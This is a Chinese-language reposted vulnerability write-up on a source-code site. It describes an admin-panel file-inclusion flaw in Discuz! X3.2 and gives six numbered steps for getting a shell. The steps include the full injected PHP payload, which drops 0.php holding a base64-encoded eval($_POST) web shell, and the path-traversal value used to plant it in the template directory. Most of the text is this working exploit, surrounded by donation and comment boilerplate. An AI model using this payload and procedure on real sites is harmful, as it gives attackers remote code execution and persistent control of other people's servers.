百分百源码网-让建站变得如此简单! 登录 注册 签到领金币!

主页 | 如何升级VIP | TAG标签

当前位置: 主页>网站教程>Discuz教程> Discuz3.2后台文件包含漏洞可后台拿shell
分享文章到:

Discuz3.2后台文件包含漏洞可后台拿shell

发布时间:12/03 来源: 浏览: 关键词:

简要描述:

最新版本:Discuz! X3.2 Release 20140618
包括以前版本

详细说明:

由于创建专题时未对

code 区域
静态化名称

做任何限制引发此漏洞



1.全局->站点信息

网站 URL: http://www.comsenz.com/#<?php file_put_contents('0.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUW2FdKTsgPz4='));?>

1.jpg





2.工具->更新缓存

2.jpg





3.门户->HTML管理

静态文件扩展名: htm

专题HTML存放目录:data/cache

3.jpg





4.创建专题

静态化名称[此处未做任何限制]:../../template/default/portal/portal_topic_test

4.jpg





5.专题管理

对刚添加的专题 开启 并生成

5.jpg





6.再次创建专题

模板名 选择刚生成的 ./template/default/portal/portal_topic_test.htm

提交

6.jpg





就执行了php代码 <?php file_put_contents('0.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUW2FdKTsgPz4='));?>



不仅仅是可以生成到专题目录,可以生成到任何可以包含的下面!

漏洞证明:

7.jpg

打赏

打赏

取消

感谢您的支持,我会继续努力的!

扫码支持
扫码打赏,你说多少就多少

打开支付宝扫一扫,即可进行扫码打赏哦

百分百源码网 建议打赏1~10元,土豪随意,感谢您的阅读!

相关文章

共有22人阅读,期待你的评论!发表评论
昵称: 网址: 验证码: 点击我更换图片
最新评论

本文标签

广告赞助

能出一分力是一分吧!

订阅获得更多模板

本文标签

广告赞助

订阅获得更多模板